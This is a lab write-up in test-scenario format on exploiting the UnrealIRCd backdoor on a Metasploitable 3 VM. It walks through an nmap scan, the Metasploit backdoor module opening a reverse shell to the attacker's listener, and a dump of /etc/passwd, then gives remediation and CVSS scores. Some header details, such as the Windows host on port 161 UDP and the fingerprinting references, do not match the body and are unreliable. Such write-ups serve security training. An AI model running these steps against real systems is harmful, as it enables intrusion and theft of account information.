## Version 1.4.1
## language: en

Feature:
  TOE:
    Metasploitable 3
  Category:
    Backdoor
  Location:
    metasploitable_w2k8:161 UDP
  CWE:
    CWE-0507: Trojan Horse -base-
      https://cwe.mitre.org/data/definitions/507.html
    CWE-0904: SFP Primary Cluster: Malware -class-
      https://cwe.mitre.org/data/definitions/904.html
  CAPEC:
    CAPEC-310: Scanning for Vulnerable Software   -detailed-
      https://capec.mitre.org/data/definitions/310.html
    CAPEC-541: Application Fingerprinting -standard-
      http://capec.mitre.org/data/definitions/541.html
    CAPEC-224: Fingerprinting -meta-
      http://capec.mitre.org/data/definitions/224.html
  Rule:
    REQ.262: https://fluidattacks.com/web/rules/262/
  Goal:
    Execute code on target system
  Recommendation:
    Keep all your software updated

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | Rolling   |
    | Nmap                  | 7.70      |
    | snmpenum              | 1.0       |
    | Metasploit            | 5.0.35    |
  TOE information:
    Given I am running Metasploitable3 Ubuntu in a VM at
    """
    172.28.128.3
    """

  Scenario: Normal use case
  Normal site navigation
    Given I have an IRC server running in my machine

  Scenario: Static detection
  No code available

  Scenario: Dynamic detection
  Getting a shell
    Given I scan the target machine with Nmap
    And find a ton of open ports
    """
    $ nmap -T5 -p- -sV 172.28.128.3
    Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-14 15:16 -05
    Nmap scan report for 172.28.128.3
    Host is up (0.00015s latency).
    Not shown: 65525 filtered ports
    PORT     STATE  SERVICE     VERSION
    ...
    3500/tcp open   http        WEBrick httpd 1.3.1 (Ruby 2.3.7 (2018-03-28))
    6697/tcp open   irc         UnrealIRCd
    ...
    """
    When I notice there is an UnrealIRC server running at port 6697
    Then I look online for exploits for that client
    And find a metasploit module available "unix/irc/unreal_ircd_3281_backdoor"
    Then I use it and it works, giving me a shell as "bobba_fett"
    """
    ...
    [*] 172.28.128.3 - Command shell session 2 closed.  Reason: User exit
    msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > run

    [*] Started reverse TCP double handler on 172.28.128.1:4444
    [*] 172.28.128.3:6697 - Connected to 172.28.128.3:6697...
        :irc.TestIRC.net NOTICE AUTH :*** Looking up your hostname...
    [*] 172.28.128.3:6697 - Sending backdoor command...
    [*] Accepted the first client connection...
    [*] Accepted the second client connection...
    [*] Command: echo HFoCRrlxIXDvxTvj;
    [*] Writing to socket A
    [*] Writing to socket B
    [*] Reading from sockets...
    [*] Reading from socket A
    [*] A: "HFoCRrlxIXDvxTvj\r\n"
    [*] Matching...
    [*] B is input...
    [*] Command shell session 3 opened (172.28.128.1:4444 -> 172.28.128.3:5...

    whoami
    boba_fett
    """

  Scenario: Exploitation
  Finding system users
    Given I have a shell into the target machine as a normal user
    Then I read /etc/passwd and get usernames for every user in the system
    """
    ...
    cat /etc/passwd
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbi...
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    libuuid:x:100:101::/var/lib/libuuid:
    syslog:x:101:104::/home/syslog:/bin/false
    messagebus:x:102:106::/var/run/dbus:/bin/false
    sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
    statd:x:104:65534::/var/lib/nfs:/bin/false
    vagrant:x:900:900:vagrant,,,:/home/vagrant:/bin/bash
    leia_organa:x:1111:100::/home/leia_organa:/bin/bash
    luke_skywalker:x:1112:100::/home/luke_skywalker:/bin/bash
    han_solo:x:1113:100::/home/han_solo:/bin/bash
    artoo_detoo:x:1114:100::/home/artoo_detoo:/bin/bash
    c_three_pio:x:1115:100::/home/c_three_pio:/bin/bash
    ben_kenobi:x:1116:100::/home/ben_kenobi:/bin/bash
    darth_vader:x:1117:100::/home/darth_vader:/bin/bash
    anakin_skywalker:x:1118:100::/home/anakin_skywalker:/bin/bash
    jarjar_binks:x:1119:100::/home/jarjar_binks:/bin/bash
    lando_calrissian:x:1120:100::/home/lando_calrissian:/bin/bash
    boba_fett:x:1121:100::/home/boba_fett:/bin/bash
    """
    Then I can use this information to further penetrate the machine

  Scenario: Remediation
  Update software
    Given I update UnrealIRC to the latest version
    Then an attacker can't use a public exploit to enter my system

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.3/10 (High) - AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.7/10 (High) - E:F/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    7.7/10 (High) - CR:M/IR:M/AR:M

  Scenario: Correlations
    No correlations have been found to this date 2019-08-14
